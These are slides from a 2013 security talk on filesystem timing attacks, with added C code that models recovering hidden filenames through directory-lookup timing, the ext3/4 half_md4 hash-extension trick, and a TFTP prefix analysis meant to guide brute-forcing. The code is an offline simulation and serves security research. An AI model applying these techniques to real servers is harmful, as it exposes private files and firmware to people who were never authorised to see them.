Filesystems timing attacks
ZeroNights, Moscow, 08/11/13
Timing attacks basics
The execution time of
Function(UserData, PrivateData)
depends on both UserData and PrivateData.
That time can therefore be used to determine PrivateData
by choosing UserData and measuring.
Filesystems timing attacks
What is Function(UserData, PrivateData) here?
Basically stat(), but not only: any syscall that resolves a path name against a directory.
FS timing attacks intro
The execution time of a directory search operation depends on:
● the search string (the name being looked up)
● the data being searched (the names already in the directory)
The attack concept: determine that data from the timings of
lookups with different search strings.
Filesystems search basics
Directory indexing mechanism
● list
● BTree (not binary tree)
● HTree
+ cache mechanism
Filesystem directory indexing

Filesystem | Directory indexing algo | Hash type                               | Cache
ext2       | list                    | -                                       | +
ext3/4     | htree                   | half_md4 + seed (earlier: legacy, TEA)  | +
ufs2/NFS   | dirhash                 | FNV (FreeBSD), DJB (OpenBSD)            | +
FAT        | list (btree)            | -                                       | +
NTFS       | btree                   | -                                       | +
To cache or not to cache
● The cache does not prevent timing attacks
● The cache removes the noise of disk operations: repeated lookups are
served from memory, so the measured time is dominated by the search itself
ext2 lists
To find a file, the directory is searched front-to-back for the
associated filename.
HTree indexes were originally developed for ext2, but the patch never
made it into the official branch. The dir_index feature can be enabled
when creating an ext2 filesystem, but the ext2 code won't act on it.
ext2 lists
./fs/ext2/dir.c:

    static inline int ext2_match (int len, const char * const name,
                                  struct ext2_dir_entry_2 * de)
    {
        if (len != de->name_len)
            return 0;
        if (!de->inode)
            return 0;
        return !memcmp(name, de->name, len);
    }

Timing anomaly: memcmp() runs only against entries whose name length equals
the length of the name being looked up. A lookup whose length matches no
existing entry therefore finishes measurably faster than one whose length
matches an existing name, and among same-length lookups the time grows with
the number of bytes memcmp() compares before the first mismatch.
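The following is an added example, not the talk's PoC: a user-space cost model of the ext2 scan above that counts the bytes memcmp() compares (the quantity on the slide's chart) and then uses that count as an oracle to recover a name of known length byte by byte. It assumes a byte-at-a-time memcmp() with early exit, which is what the kernel's generic lib/string.c version does (architecture-optimised versions that compare whole words coarsen the signal), and a constructed directory listing stands in for real stat() timings.

```c
/* Cost model of the ext2 directory scan: per entry, compare the length first
 * and run memcmp() only on a length match, exactly like ext2_match().
 * "cost" is the number of bytes memcmp() touches. Example code, not the
 * talk's PoC; memcmp() is assumed byte-at-a-time with early exit. */
#include <stdio.h>
#include <string.h>

#define MAX_NAME 255

struct dirent_model { const char *name; };

/* Bytes memcmp() reads before returning: matching prefix + 1, capped at len. */
static int memcmp_cost(const char *a, const char *b, int len)
{
    for (int i = 0; i < len; i++)
        if (a[i] != b[i])
            return i + 1;
    return len;
}

/* Scan front-to-back like ext2_find_entry(), stopping at the first hit.
 * Returns the total compared bytes; *found is set when the name exists. */
static int scan_cost(const struct dirent_model *dir, int n,
                     const char *name, int len, int *found)
{
    int cost = 0;
    *found = 0;
    for (int i = 0; i < n; i++) {
        if ((int)strlen(dir[i].name) != len)   /* length check: no memcmp */
            continue;
        cost += memcmp_cost(name, dir[i].name, len);
        if (memcmp(name, dir[i].name, len) == 0) {
            *found = 1;
            return cost;                       /* lookup returns on a hit */
        }
    }
    return cost;
}

/* Step 1: a probe of length L costs > 0 only if some entry has length L. */
static int length_exists(const struct dirent_model *dir, int n, int len)
{
    char probe[MAX_NAME];
    int found;
    memset(probe, 0x01, sizeof probe);         /* filler byte unlikely in real names */
    return scan_cost(dir, n, probe, len, &found) > 0;
}

/* Step 2: recover an entry of known length byte by byte, keeping the byte that
 * maximises compared bytes (ties: lowest byte). The last byte cannot be told
 * apart by cost alone (mismatch at byte 12 costs 12, like a match), so a hit
 * is recognised from the lookup result, as stat() succeeding would show. */
static void recover_name(const struct dirent_model *dir, int n, int len, char *out)
{
    char probe[MAX_NAME];
    int found;
    memset(probe, 0x01, sizeof probe);
    for (int pos = 0; pos < len; pos++) {
        int best = -1, best_cost = -1;
        for (int c = 1; c < 256; c++) {
            if (c == '/')                      /* never appears in an entry name */
                continue;
            probe[pos] = (char)c;
            int cost = scan_cost(dir, n, probe, len, &found);
            if (found) { best = c; break; }
            if (cost > best_cost) { best_cost = cost; best = c; }
        }
        probe[pos] = (char)best;
    }
    memcpy(out, probe, (size_t)len);
    out[len] = '\0';
}

int main(void)
{
    /* Constructed sample directory, in ext2 order ("." and ".." first). */
    const struct dirent_model dir[] = {
        {"."}, {".."}, {"lost+found"}, {"config.txt"}, {"firmware.bin"}, {"rom.bin"}
    };
    int n = (int)(sizeof dir / sizeof dir[0]);
    char name[MAX_NAME + 1];

    for (int len = 1; len <= 16; len++)
        if (length_exists(dir, n, len)) {
            recover_name(dir, n, len, name);
            printf("length %2d exists, recovered \"%s\"\n", len, name);
        }
    return 0;
}
```

On a real target the oracle is the minimum of many repeated stat() timings per probe, as the PoC from the talk does, and when two entries share a length the greedy step above recovers whichever one wins the first tie (here "config.txt" before "lost+found").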
ext2 results
[chart: 10 loops of 100k stat() calls each; time plotted against compared bytes]
OPTIMIZATION
ext3/4 HTree
./fs/ext3/hash.c: ext3fs_dirhash

    * Returns the hash of a filename. If len is 0 and name is NULL, then
    * this function can be used to test whether or not a hash version is
    * supported.
    *
    * The seed is an 4 longword (32 bits) "secret" which can be used to
    * uniquify a hash. If the seed is all zero's, then some default seed
    * may be used.
ext3/4 HTree
4 x 32 bits = 16 bytes of seed: impossible to brute force ;(
ext3/4 predicted seed
● Useful when the filesystem comes from a firmware image
● All devices flashed with the same firmware image share the same seed:
mkfs ran once at build time and the seed lives in the superblock that was copied
What hash type does ext3/4 use?
man tune2fs:

    hash_alg=hash-alg
        Set the default hash algorithm used for filesystems
        with hashed b-tree directories. Valid algorithms
        accepted are: legacy, half_md4, and tea.

half_md4 by default
ext3/4 MD4 hash tricks
./fs/ext3/hash.c: ext3fs_dirhash, the half_md4 case:

    p = name;
    while (len > 0) {
        (*str2hashbuf)(p, len, in, 8);
        half_md4_transform(buf, in);
        len -= 32;
        p += 32;
    }
    minor_hash = buf[2];
    hash = buf[1];
    break;

Notes from the slide:
● mkfs.ext3/4 takes the seed from /dev/urandom
● the seed is 16 bytes (4 x 32-bit longs), the "secret"; it initialises buf, the 128 bits of hash state
● those 128 bits of state after one 32-byte block are all that is required to calculate the hashes of the following blocks
ext3/4 MD4 hash tricks
MD4($salt . $filename) - really?
If you know the hash state after MD4($salt . "a"),
you know MD4($salt . "a" . $postfix)
without any knowledge of the $salt value!
(The chaining is per 32-byte block, as the loop above shows: the state is
reusable exactly when the known prefix fills whole blocks, because str2hashbuf
pads a partial last block with the remaining name length.)
What is $salt?
The seed, which is unique per filesystem and shared by all its directories.
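An added example (not kernel code and not the talk's tooling) of the chaining trick described on the last two slides: a user-space model of the half_md4 directory hash, following the loop shown above (str2hashbuf, then half_md4_transform, per 32-byte block, state initialised from the 16-byte seed). The transform and padding are modelled on the kernel's lib/halfmd4.c and hash.c; the seed and names are constructed. The point it demonstrates is that the 128-bit state after a block-aligned prefix is enough to hash any continuation without the seed. Check exact hash values against a real filesystem before relying on them.

```c
/* Model of the ext3/4 half_md4 directory hash and its block chaining.
 * Added example; transform and padding modelled on the kernel sources. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

static uint32_t rol32(uint32_t w, int s) { return (w << s) | (w >> (32 - s)); }

/* MD4 round functions F (round 0), G (round 1), H (round 2). */
static uint32_t mix(int round, uint32_t x, uint32_t y, uint32_t z)
{
    switch (round) {
    case 0:  return z ^ (x & (y ^ z));
    case 1:  return (x & y) + ((x ^ y) & z);
    default: return x ^ y ^ z;
    }
}

/* Three MD4 rounds over one 8-word block, modelled on half_md4_transform(). */
static void half_md4_transform(uint32_t buf[4], const uint32_t in[8])
{
    static const int idx[3][8] = {{0,1,2,3,4,5,6,7}, {1,3,5,7,0,2,4,6}, {3,7,2,6,1,5,0,4}};
    static const int sh[3][4]  = {{3,7,11,19}, {3,5,9,13}, {3,9,11,15}};
    static const uint32_t k[3] = {0, 0x5A827999u, 0x6ED9EBA1u};
    uint32_t v[4] = {buf[0], buf[1], buf[2], buf[3]};
    for (int r = 0; r < 3; r++)
        for (int i = 0; i < 8; i++) {   /* rotate through (a,b,c,d), (d,a,b,c), ... */
            int a = (4 - i % 4) % 4, b = (a + 1) % 4, c = (a + 2) % 4, d = (a + 3) % 4;
            v[a] = rol32(v[a] + mix(r, v[b], v[c], v[d]) + in[idx[r][i]] + k[r], sh[r][i % 4]);
        }
    for (int i = 0; i < 4; i++)
        buf[i] += v[i];
}

/* str2hashbuf_signed(): pack up to num*4 name bytes into words. A partial
 * block is padded with the *remaining* name length repeated in every byte. */
static void str2hashbuf(const char *msg, int len, uint32_t *buf, int num)
{
    uint32_t pad = (uint32_t)len | ((uint32_t)len << 8), val;
    pad |= pad << 16;
    val = pad;
    if (len > num * 4)
        len = num * 4;
    for (int i = 0; i < len; i++) {
        val = (uint32_t)(int)(signed char)msg[i] + (val << 8);
        if ((i % 4) == 3) { *buf++ = val; val = pad; num--; }
    }
    if (--num >= 0)
        *buf++ = val;
    while (--num >= 0)
        *buf++ = pad;
}

/* The loop from ext3fs_dirhash(): absorb the name one 32-byte block at a time. */
static void absorb(uint32_t state[4], const char *p, int len)
{
    uint32_t in[8];
    while (len > 0) {
        str2hashbuf(p, len, in, 8);
        half_md4_transform(state, in);
        len -= 32;
        p += 32;
    }
}

/* Initial state: the 16-byte superblock seed, or MD4's IV if the seed is all zero. */
static void init_state(const uint32_t seed[4], uint32_t state[4])
{
    static const uint32_t iv[4] = {0x67452301u, 0xefcdab89u, 0x98badcfeu, 0x10325476u};
    memcpy(state, (seed[0] | seed[1] | seed[2] | seed[3]) ? seed : iv, 4 * sizeof *state);
}

/* hash = buf[1] with the low bit cleared, minor_hash = buf[2], as the kernel returns them. */
static uint32_t finish(const uint32_t st[4], uint32_t *minor)
{
    if (minor) *minor = st[2];
    return st[1] & ~1u;
}

/* What the filesystem computes: the seeded hash of the whole name. */
static uint32_t dirhash(const uint32_t seed[4], const char *name, int len, uint32_t *minor)
{
    uint32_t st[4];
    init_state(seed, st);
    absorb(st, name, len);
    return finish(st, minor);
}

/* The 128 bits of state after a prefix made of whole 32-byte blocks. */
static void prefix_state(const uint32_t seed[4], const char *prefix, int len, uint32_t state[4])
{
    init_state(seed, state);
    absorb(state, prefix, len);
}

/* The trick: continue from that state and hash prefix+suffix without the seed. */
static uint32_t hash_extend(const uint32_t state[4], const char *suffix, int len, uint32_t *minor)
{
    uint32_t st[4];
    memcpy(st, state, sizeof st);
    absorb(st, suffix, len);
    return finish(st, minor);
}

int main(void)
{
    const uint32_t seed[4] = {0x01234567u, 0x89abcdefu, 0xdeadbeefu, 0xfeedfaceu}; /* constructed */
    const char *full = "0123456789abcdef0123456789abcdef.bin";   /* 32-byte prefix + ".bin" */
    uint32_t st[4], m;
    prefix_state(seed, full, 32, st);
    printf("seeded hash       : %08x\n", dirhash(seed, full, 36, &m));
    printf("extended, no seed : %08x\n", hash_extend(st, full + 32, 4, &m));
    return 0;
}
```

The two printed values are equal: whoever learns the state after the first 32 bytes can compute the hash of every name sharing that 32-byte prefix. For prefixes that do not fill a whole block the padding word changes with the remaining length, so the state is not transferable there.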
ext3/4 legacy hash

    static __u32 dx_hack_hash_signed(const char *name, int len)
    {
        __u32 hash, hash0 = 0x12a3fe2d, hash1 = 0x37abe8f9;
        const signed char *scp = (const signed char *) name;
        while (len--) {
            hash = hash1 + (hash0 ^ (((int) *scp++) * 7152373));
            if (hash & 0x80000000)
                hash -= 0x7fffffff;
            hash1 = hash0;
            hash0 = hash;
        }
        return hash0 << 1;
    }
Binary search for timing attack
ext3_find_entry -> ext3_dx_find_entry -> dx_probe:

    p = entries + 1;
    q = entries + count - 1;
    while (p <= q)
    {
        m = p + (q - p)/2;
        dxtrace(printk("."));
        if (dx_get_hash(m) > hash)
            q = m - 1;
        else
            p = m + 1;
    }

Each step of the search narrows what is known about the hash of the name being looked up:
1. min_hash <= hash <= max_hash
2. (max - min)/2 <= hash
3. ...
The total lookup time is the sum of the per-step times: T = T1 + T2 + T3 + T4
ufs2/NFS FNV hash - no seed/salt!

    static __inline Fnv32_t
    fnv_32_buf(const void *buf, size_t len, Fnv32_t hval)
    {
        const u_int8_t *s = (const u_int8_t *)buf;
        while (len-- != 0) {
            hval *= FNV_32_PRIME;
            hval ^= *s++;
        }
        return hval;
    }
ufs2/NFS DJB hash - no seed/salt!

    #define HASHINIT        5381
    #define HASHSTEP(x,c)   (((x << 5) + x) + (c))

    static __inline uint32_t
    hash32_buf(const void *buf, size_t len, uint32_t hash)
    {
        const unsigned char *p = buf;
        while (len--)
            hash = HASHSTEP(hash, *p++);
        return hash;
    }
UFS search by filename
ufs_lookup -> ufs_lookup_ino:

    switch (ufsdirhash_lookup(dp, cnp->cn_nameptr, cnp->cn_namelen,
        &i_offset, &bp, nameiop == DELETE ?
        &prevoff : NULL)) {
    case 0:
        ep = (struct direct *)((char *)bp->b_data +
            (i_offset & bmask));
        goto foundentry;
    case ENOENT:
        i_offset = roundup2(dp->i_size, DIRBLKSIZ);
        goto notfound;
    default: break;

ufsdirhash_lookup:

    ...
    for (; (offset = DH_ENTRY(dh, slot)) !=
        DIRHASH_EMPTY;
        slot = WRAPINCR(slot, dh->dh_hlen)) {
        ...
        if (dp->d_namlen == namelen &&
            bcmp(dp->d_name, name, namelen) == 0) {
            /* Found. Get the prev offset if needed. */
            if (prevoffp != NULL) {
                if (offset & (DIRBLKSIZ - 1)) {
                    prevoff = ufsdirhash_getprev(dp,
                        offset);
                    if (prevoff == -1) {
                        error = EJUSTRETURN;
                        goto fail;
                    }
                } else
    ...

Same pattern as ext2_match(): the slot walk compares d_namlen first and calls
bcmp() only on a length match, so both the number of slots walked and the bytes
bcmp() compares show up in the lookup time.
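An added example, not FreeBSD or OpenBSD code: the two unsalted name hashes from the slides together with a toy model of the ufsdirhash_lookup() slot walk above, so the cost of a probe (slots visited, bytes compared by bcmp()) can be worked out offline for any guess. The table size HLEN, the directory contents and the byte-at-a-time bcmp() are assumptions. One check before relying on slot prediction on a real target: read ufsdirhash_hash() in that version's ufs_dirhash.c and confirm it feeds only the name into the hash (FreeBSD's mixes in the address of the per-directory dirhash struct); a per-directory value changes the home slot but not the length-then-bcmp() timing.

```c
/* Unsalted UFS dirhash name hashes and a toy model of the slot walk.
 * Added example; HLEN and the directory contents are constructed. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define FNV1_32_INIT   0x811c9dc5u
#define FNV_32_PRIME   0x01000193u
#define HASHINIT       5381u
#define HASHSTEP(x, c) ((((x) << 5) + (x)) + (c))
#define HLEN           16        /* toy slot count; the real dirhash sizes it from the directory */
#define EMPTY          (-1)
#define WRAPINCR(s)    (((s) + 1) % HLEN)

/* FreeBSD: FNV-1 (multiply, then xor). No seed anywhere. */
static uint32_t fnv_32_buf(const void *buf, size_t len, uint32_t hval)
{
    const uint8_t *s = buf;
    while (len-- != 0) {
        hval *= FNV_32_PRIME;
        hval ^= *s++;
    }
    return hval;
}

/* OpenBSD: DJB hash, equally seedless. */
static uint32_t hash32_buf(const void *buf, size_t len, uint32_t hash)
{
    const unsigned char *p = buf;
    while (len--)
        hash = HASHSTEP(hash, *p++);
    return hash;
}

/* Home slot of a name: computable offline by anyone who knows the table size. */
static int fnv_slot(const char *name) { return (int)(fnv_32_buf(name, strlen(name), FNV1_32_INIT) % HLEN); }
static int djb_slot(const char *name) { return (int)(hash32_buf(name, strlen(name), HASHINIT) % HLEN); }

struct toy_dirhash {
    int slot[HLEN];              /* index into names[], or EMPTY */
    const char *names[HLEN];
    int n;
};

static void init_dirhash(struct toy_dirhash *dh)
{
    for (int i = 0; i < HLEN; i++)
        dh->slot[i] = EMPTY;
    dh->n = 0;
}

/* Insert with linear probing from the FNV home slot (FreeBSD flavour). */
static int add_entry(struct toy_dirhash *dh, const char *name)
{
    int s = fnv_slot(name);
    while (dh->slot[s] != EMPTY)
        s = WRAPINCR(s);
    dh->slot[s] = dh->n;
    dh->names[dh->n++] = name;
    return s;
}

struct cost { int probes; int bytes; int found; };

/* Bytes a byte-at-a-time bcmp() reads before returning: matching prefix + 1, capped at len. */
static int bcmp_cost(const char *a, const char *b, int len)
{
    for (int i = 0; i < len; i++)
        if (a[i] != b[i])
            return i + 1;
    return len;
}

/* Model of ufsdirhash_lookup(): walk from the home slot until an empty slot,
 * comparing the length first and running bcmp() only on a length match. */
static struct cost lookup_cost(const struct toy_dirhash *dh, const char *name)
{
    struct cost c = {0, 0, 0};
    size_t len = strlen(name);
    for (int s = fnv_slot(name); dh->slot[s] != EMPTY; s = WRAPINCR(s)) {
        const char *e = dh->names[dh->slot[s]];
        c.probes++;
        if (strlen(e) != len)      /* d_namlen == namelen fails: no bcmp() */
            continue;
        c.bytes += bcmp_cost(e, name, (int)len);
        if (memcmp(e, name, len) == 0) {
            c.found = 1;
            break;
        }
    }
    return c;
}

/* A guess is only compared against entries on its own probe chain, so this
 * says whether a guess can leak anything about `target` at all. */
static int chain_meets(const struct toy_dirhash *dh, const char *guess, const char *target)
{
    for (int s = fnv_slot(guess); dh->slot[s] != EMPTY; s = WRAPINCR(s))
        if (strcmp(dh->names[dh->slot[s]], target) == 0)
            return 1;
    return 0;
}

int main(void)
{
    struct toy_dirhash dh;
    const char *entries[] = {"rom.bin", "config.txt", "firmware.bin"};          /* constructed */
    const char *guesses[] = {"firmware.bin", "firmware.biX", "Xirmware.bin", "nope"};
    init_dirhash(&dh);
    for (int i = 0; i < 3; i++) {
        int at = add_entry(&dh, entries[i]);
        printf("%-13s fnv slot %2d  djb slot %2d  stored at %2d\n",
               entries[i], fnv_slot(entries[i]), djb_slot(entries[i]), at);
    }
    for (int i = 0; i < 4; i++) {
        struct cost c = lookup_cost(&dh, guesses[i]);
        printf("%-13s probes=%d bytes=%d found=%d on target chain=%d\n", guesses[i],
               c.probes, c.bytes, c.found, chain_meets(&dh, guesses[i], "firmware.bin"));
    }
    return 0;
}
```

Because the hash is unsalted, the attacker can precompute which guesses land on the chain that holds the target and only spend measurements on those; a guess that never walks past the target entry carries no byte-comparison signal, whatever its prefix.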
FAT/NTFS results
● B-tree + binary search: no hashes, no problems ;) (the names themselves are compared, so the timing relates to the name directly)
● Just test it using the PoC from github
PoC
● Simple tool that demonstrates the timing anomaly
● Just a PoC, not a framework
● Framework soon ;)
https://github.com/wallarm/researches/blob/master/fstiming/fs-timing.c
Remote attacks
● Network noise
● No opportunity to request multiple files in the same loop
● But you can use additional side effects:
  ○ CPU overload
  ○ inode count
  ○ memory usage
  I think you know how to do it remotely ;)
Real case from the wild
● TFTP service
● Classic bruteforce without results
● The times to retrieve files differ
● Sort them!
● Find prefixes with anomalous timings:
  ○ rom
  ○ firmware.
  ○ ...
● Bruteforce the rest of the filename after those prefixes
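An added example, not the talk's tooling, of the analysis step in the TFTP case above: take (name, response time) samples from a wordlist run, sort them by time, and for every prefix of a given length compare the median time of names carrying that prefix with the median of all other names; prefixes that are consistently slower are the candidates for the next brute-force round. Medians and a minimum group size are used so that a single network spike does not turn into a "prefix". The sample data, the threshold and the group-size limit are constructed assumptions.

```c
/* Prefix-anomaly analysis over timing samples. Added example; the sample
 * data below is constructed, not measured. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_SAMPLES 256
#define MAX_PREFIX  16

struct sample { const char *name; double ms; };

static int by_time_desc(const void *a, const void *b)
{
    double x = ((const struct sample *)a)->ms, y = ((const struct sample *)b)->ms;
    return (x < y) - (x > y);
}

static int by_double(const void *a, const void *b)
{
    double x = *(const double *)a, y = *(const double *)b;
    return (x > y) - (x < y);
}

/* Median of n values (n <= MAX_SAMPLES); robust against single slow outliers. */
static double median(const double *v, int n)
{
    double tmp[MAX_SAMPLES];
    memcpy(tmp, v, (size_t)n * sizeof *v);
    qsort(tmp, (size_t)n, sizeof *tmp, by_double);
    return n % 2 ? tmp[n / 2] : (tmp[n / 2 - 1] + tmp[n / 2]) / 2.0;
}

/* Median time of names starting with `prefix` divided by the median of the
 * rest. *count receives how many names share the prefix; returns 0 when the
 * prefix matches nothing or everything. */
static double prefix_ratio(const struct sample *s, int n, const char *prefix, int *count)
{
    double in[MAX_SAMPLES], out[MAX_SAMPLES];
    int ni = 0, no = 0;
    size_t plen = strlen(prefix);
    for (int i = 0; i < n; i++) {
        if (strncmp(s[i].name, prefix, plen) == 0)
            in[ni++] = s[i].ms;
        else
            out[no++] = s[i].ms;
    }
    *count = ni;
    if (ni == 0 || no == 0)
        return 0.0;
    return median(in, ni) / median(out, no);
}

/* Enumerate the distinct prefixes of length plen present in the samples and
 * keep those shared by at least min_count names whose ratio exceeds
 * threshold. Returns how many were written to out[]. */
static int anomalous_prefixes(const struct sample *s, int n, int plen, double threshold,
                              int min_count, char out[][MAX_PREFIX], int max)
{
    int found = 0;
    if (plen <= 0 || plen >= MAX_PREFIX)
        return 0;
    for (int i = 0; i < n && found < max; i++) {
        char p[MAX_PREFIX];
        int dup = 0, count;
        if (strlen(s[i].name) < (size_t)plen)
            continue;
        memcpy(p, s[i].name, (size_t)plen);
        p[plen] = '\0';
        for (int j = 0; j < found; j++)
            if (strcmp(out[j], p) == 0)
                dup = 1;
        if (dup)
            continue;
        if (prefix_ratio(s, n, p, &count) > threshold && count >= min_count)
            strcpy(out[found++], p);
    }
    return found;
}

/* Constructed data for a wordlist run against a TFTP server: names sharing a
 * prefix with real files ("rom*", "firmware.*") came back slower; "index" is
 * one network spike that must not become a prefix. */
static struct sample demo[] = {
    {"admin", 4.1}, {"backup", 4.0}, {"config", 4.2}, {"index", 9.5},
    {"rom", 6.3}, {"romfs", 6.4}, {"rom.bin", 6.2},
    {"firmware", 6.1}, {"firmware.bin", 6.5}, {"firmware.img", 6.6},
    {"test", 4.3}, {"upload", 3.9}, {"www", 4.0},
};
static const int demo_n = (int)(sizeof demo / sizeof demo[0]);

int main(void)
{
    char out[8][MAX_PREFIX];
    qsort(demo, (size_t)demo_n, sizeof demo[0], by_time_desc);   /* "Sort it!" */
    for (int i = 0; i < demo_n; i++)
        printf("%5.1f ms  %s\n", demo[i].ms, demo[i].name);
    for (int plen = 3; plen <= 9; plen += 6) {
        int k = anomalous_prefixes(demo, demo_n, plen, 1.3, 2, out, 8);
        for (int i = 0; i < k; i++)
            printf("prefix length %d: anomalous prefix \"%s\"\n", plen, out[i]);
    }
    return 0;
}
```

With the constructed data the length-3 pass reports "rom" and "fir" and the length-9 pass reports "firmware.", while the lone 9.5 ms "index" sample is ignored because it has no second name behind it; the next wordlist round is then run only behind the reported prefixes.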
Next steps
● And... YES!
● We want to optimize classic DirBusting
● Turn brute force into a search guided by timing attacks!
The end
Contacts:
@wallarm, @d0znpp
http://github.com/wallarm
(No)SQL timing attacks at: